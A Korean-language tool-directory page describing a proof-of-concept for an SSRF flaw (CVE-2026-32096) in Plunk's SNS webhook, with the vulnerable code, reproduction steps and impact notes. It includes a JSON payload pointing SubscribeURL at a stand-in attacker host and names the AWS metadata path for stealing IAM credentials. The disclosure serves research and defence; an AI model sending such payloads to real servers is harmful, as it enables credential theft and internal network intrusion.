Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-32096 — Proof-of-concept exploit for an SSRF vulnerability in Plunk's SNS webhook, demonstrating unauthenticated server-side request forgery via unvalidated SubscribeURL. | Kitploit
도구/GitHubGitHub/andrebhu/cve-2026-32096
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

Proof-of-concept exploit for an SSRF vulnerability in Plunk's SNS webhook, demonstrating unauthenticated server-side request forgery via unvalidated SubscribeURL.

저장소 보기
5개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-32096

useplunk/plunk의 검증되지 않은 AWS SNS SubscriptionConfirmation을 통한 SSRF

요약

Plunk API 엔드포인트 POST /webhooks/sns는 AWS SNS 암호화 서명을 검증하지 않고 공격자가 제공한 SubscribeURL을 가져옵니다. 인증되지 않은 공격자는 서버가 임의의 아웃바운드 HTTP 요청(SSRF)을 수행하도록 강제할 수 있습니다.

심각도치명적 — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: 서버 측 요청 위조
영향을 받는 파일apps/api/src/controllers/Webhooks.ts
인증 필요없음

취약한 코드

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — 서명 검증 없음
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

최소 페이로드는 두 개의 필드만 있으면 됩니다:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

영향

  • AWS EC2/ECS: http://169.254.169.254/latest/meta-data/iam/security-credentials/를 통해 IAM 자격 증명 탈취
  • 내부 서비스: 데이터베이스, Redis, Kubernetes API 또는 인터넷에 노출되지 않은 기타 서비스에 접근
  • 포트 스캐닝: 타이밍 및 오류 기반 응답을 통해 내부 포트 열거

재현

사전 요구 사항

  • Docker 및 Docker Compose
  • Python 3

단계

  1. Plunk 테스트 환경 시작:

    root@kitploit:~
    docker compose up -d
    
  2. SSRF 콜백 리스너 시작:

    root@kitploit:~
    python3 listener.py
    
  3. 익스플로잇 실행:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. 관찰: listener.py 출력에서 콜백 히트를 확인하여 서버가 공격자가 제어하는 URL을 가져왔는지 확인합니다.

파일

파일설명
exploit.sh종단 간 익스플로잇 스크립트 — 취약한 엔드포인트에 위조된 SNS 페이로드 전송
listener.pySSRF 콜백 리스너 — Plunk 서버에서 들어오는 요청을 캡처하고 기록
docker-compose.yml로컬 재현을 위한 최소 Docker Compose 환경 (Postgres, Redis, Plunk)

참고 자료

  • AWS SNS: Amazon SNS 메시지의 서명 검증
  • OWASP SSRF 방지 치트 시트
도구 다운로드